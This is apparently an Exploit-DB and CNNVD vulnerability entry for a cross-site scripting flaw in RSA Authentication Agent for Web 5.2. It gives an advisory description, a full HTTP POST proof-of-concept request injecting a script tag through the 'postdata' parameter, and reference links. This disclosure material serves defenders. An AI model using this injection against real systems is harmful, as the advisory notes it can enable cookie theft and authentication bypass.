https://www.exploit-db.com/exploits/25421
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200504-035

RSA认证代理软件是非常流行的动态认证工具，可控制对公司网络、基于web的应用和操作系统的访问。RSAAuthenticationAgentforWeb5.2的IISWebAgentIF.dll存在跨站脚本攻击(XSS)漏洞，远程攻击者可以通过postdata参数来注入任意web脚本或HTML。

source: http://www.securityfocus.com/bid/13168/info

A remote cross-site scripting vulnerability affects the RSA Security RSA Authentication Agent for Web. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks, due to the nature of the application, bypassing authentication requirements may be possible. 

POST /WebID/IISWebAgentIF.dll HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.example.com
Cache-Control: no-cache
Referer: https://www.example.com/
Content-Length: 135

stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata="><script>alert("Vulnerable")</script>&authntype=2&username=asdf&passcode=jkl%F6

来源:US-CERT
名称:VU#366372
链接:http://www.kb.cert.org/vuls/id/366372
来源:XF
名称:rsa-auth-postdata-xss(20098)
链接:http://xforce.iss.net/xforce/xfdb/20098
来源:MISC
链接:http://www.oliverkarow.de/research/rsaxss.txt
来源:SECTRACK
名称:1013724
链接:http://securitytracker.com/id?1013724
来源:SECUNIA
名称:14954
链接:http://secunia.com/advisories/14954
来源:BID
名称:13168
链接:http://www.securityfocus.com/bid/13168